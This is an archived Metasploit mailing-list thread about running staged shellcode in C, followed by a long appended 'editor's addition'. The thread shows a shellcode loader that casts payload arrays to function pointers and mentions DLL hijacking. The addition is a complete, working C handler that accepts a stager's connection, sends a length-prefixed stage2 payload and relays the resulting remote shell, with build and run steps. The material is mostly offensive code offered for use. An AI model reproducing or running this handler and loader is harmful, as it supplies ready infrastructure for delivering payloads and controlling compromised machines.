Metasploit mailing list archives
Re: What is the output of msfpayload in C format
From: eski mo <eskimo.ganges () gmail com>
Date: Tue, 7 Sep 2010 21:37:34 -0700
Thanks for the info egypt, it indeed helped. I've got two more queries:

1. How do I write code (between the connection of stage1 and the passing of stage2 over stage1), something like "look for a socket pattern and then load stage2"? I tried surfing the msf directory, but no clue.

2. When I write shellcode (any, e.g. to get a cmd prompt, taken from exploit-db) inside a DLL and place the DLL for DLL hijacking, it doesn't run. But forensics show the DLL is loaded...

Regards,
eskim0

On Tue, Sep 7, 2010 at 8:56 AM, <egypt () metasploit com> wrote:
The first stage will not return; it executes the second stage. So your testing code does not need stage2, as that should come from the network. If you're using Metasploit as the handler, it will be sent automatically based on your settings. If you're trying to build a client in C for handling the stage, it would have to send stage2 over the stage1 connection and then deal with whatever stage2 does (e.g. talk to a shell on the same socket).

Hope this helped,
egypt

On Tue, Sep 7, 2010 at 12:13 AM, eski mo <eskimo.ganges () gmail com> wrote:

I think I moved one step ahead; the solution to my last query was to load stage1, then WAIT FOR A REPLY FROM THE SERVER, and then load stage2. The code goes like this:

    char stage1[] = " ...code ..";
    char stage2[] = " ...code..";
    int (*func)();

    func = (int (*)()) stage1;
    func();                          /* run stage1 */

    /* wait for server to be ready for stage2 ... what code will go here??? */

    func = (int (*)()) stage2;
    func();                          /* run stage2 */

Pointers please, guys...
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
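An added example (editor's addition, not code from this thread, from eskimo, or from Metasploit) of the client egypt describes: a C handler that accepts the stage1 connection, sends stage2 over that same socket, and then relays the terminal to whatever stage2 leaves on it. It assumes the stager expects a 4-byte little-endian length prefix followed by the stage bytes (the framing Metasploit's Windows reverse_tcp stager reads; confirm it for your own stager). The function names send_stage/recv_stage/relay/framing_self_test, the 16 MiB sanity cap, and the sample bytes inside framing_self_test are all assumptions of this example. recv_stage plays the stager's side of the exchange so the framing can be exercised locally over a socketpair without any shellcode involved.

```c
/* Added example, not code from this thread or from Metasploit: a minimal C
 * stage handler of the kind egypt describes (accept stage1's connection, push
 * stage2 down the same socket, then relay the terminal to whatever stage2 does).
 * ASSUMPTION: the stager reads <4-byte little-endian length><stage bytes>, as
 * Metasploit's Windows reverse_tcp stager does; verify this against your stager. */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>

/* Move exactly len bytes; 0 on success, -1 on error or EOF. */
static int write_all(int fd, const void *buf, size_t len) {
    for (const unsigned char *p = buf; len > 0;) {
        ssize_t n = write(fd, p, len);
        if (n < 0) { if (errno == EINTR) continue; return -1; }
        p += n; len -= (size_t)n;
    }
    return 0;
}
static int read_all(int fd, void *buf, size_t len) {
    for (unsigned char *p = buf; len > 0;) {
        ssize_t n = read(fd, p, len);
        if (n <= 0) { if (n < 0 && errno == EINTR) continue; return -1; }
        p += n; len -= (size_t)n;
    }
    return 0;
}

/* Handler side: length prefix, then the stage itself. */
int send_stage(int fd, const unsigned char *stage, uint32_t len) {
    unsigned char hdr[4] = { len & 0xff, (len >> 8) & 0xff,
                             (len >> 16) & 0xff, (len >> 24) & 0xff };
    if (write_all(fd, hdr, sizeof hdr) < 0) return -1;
    return write_all(fd, stage, len);
}

/* Stager side of the same framing, so the exchange can be exercised locally
 * without any shellcode. Caller frees the returned buffer. */
unsigned char *recv_stage(int fd, uint32_t *len_out) {
    unsigned char hdr[4];
    if (read_all(fd, hdr, sizeof hdr) < 0) return NULL;
    uint32_t len = hdr[0] | (hdr[1] << 8) | (hdr[2] << 16) | ((uint32_t)hdr[3] << 24);
    if (len == 0 || len > (16u << 20)) return NULL;   /* refuse absurd sizes */
    unsigned char *buf = malloc(len);
    if (buf && read_all(fd, buf, len) < 0) { free(buf); buf = NULL; }
    if (buf) *len_out = len;
    return buf;
}

/* Constructed round trip over a socketpair (not a real stage): returns 1 if
 * recv_stage() gets back exactly the bytes send_stage() put on the wire. */
int framing_self_test(void) {
    static const unsigned char sample[] = "\xcc\xcc\xcc\xcc constructed stage2";
    int sv[2]; uint32_t got_len = 0;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return 0;
    unsigned char *got = send_stage(sv[0], sample, sizeof sample) == 0
                         ? recv_stage(sv[1], &got_len) : NULL;
    int ok = got && got_len == sizeof sample && memcmp(got, sample, got_len) == 0;
    free(got); close(sv[0]); close(sv[1]);
    return ok;
}

/* After the stage is sent, stage2 owns the socket: stdin -> socket, socket -> stdout. */
void relay(int fd) {
    char buf[4096];
    for (;;) {
        fd_set rd; FD_ZERO(&rd); FD_SET(0, &rd); FD_SET(fd, &rd);
        if (select(fd + 1, &rd, NULL, NULL, NULL) < 0) { if (errno == EINTR) continue; return; }
        if (FD_ISSET(0, &rd)) {
            ssize_t n = read(0, buf, sizeof buf);
            if (n <= 0 || write_all(fd, buf, (size_t)n) < 0) return;
        }
        if (FD_ISSET(fd, &rd)) {
            ssize_t n = read(fd, buf, sizeof buf);
            if (n <= 0 || write_all(1, buf, (size_t)n) < 0) return;
        }
    }
}

int main(int argc, char **argv) {
    if (argc != 3) { fprintf(stderr, "usage: %s <port> <stage2.bin>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[2], "rb");                 /* file holding the raw stage bytes */
    long sz = f && fseek(f, 0, SEEK_END) == 0 ? ftell(f) : -1;
    unsigned char *stage = sz > 0 ? malloc((size_t)sz) : NULL;
    if (!stage || fseek(f, 0, SEEK_SET) || fread(stage, 1, (size_t)sz, f) != (size_t)sz) { perror("stage"); return 1; }
    int ls = socket(AF_INET, SOCK_STREAM, 0), one = 1;
    setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons((uint16_t)atoi(argv[1])) };
    if (bind(ls, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(ls, 1) < 0) { perror("listen"); return 1; }
    int c = accept(ls, NULL, NULL);
    if (c < 0 || send_stage(c, stage, (uint32_t)sz) < 0) { perror("accept/send"); return 1; }
    fprintf(stderr, "[*] sent %ld-byte stage, relaying\n", sz);
    relay(c);
    return 0;
}
```

Build it with a C compiler on a POSIX host, put the raw stage bytes in a file, and run ./handler <port> stage2.bin before the stager connects; once the length-prefixed stage has gone out, whatever stage2 puts on the socket (a shell prompt, for example) shows up on the terminal. Note that this answers egypt's point rather than eskimo's loader: the handler never waits for the stager to "signal readiness", it simply writes the stage as soon as the connection is accepted, because the stager is already blocked in its receive by then.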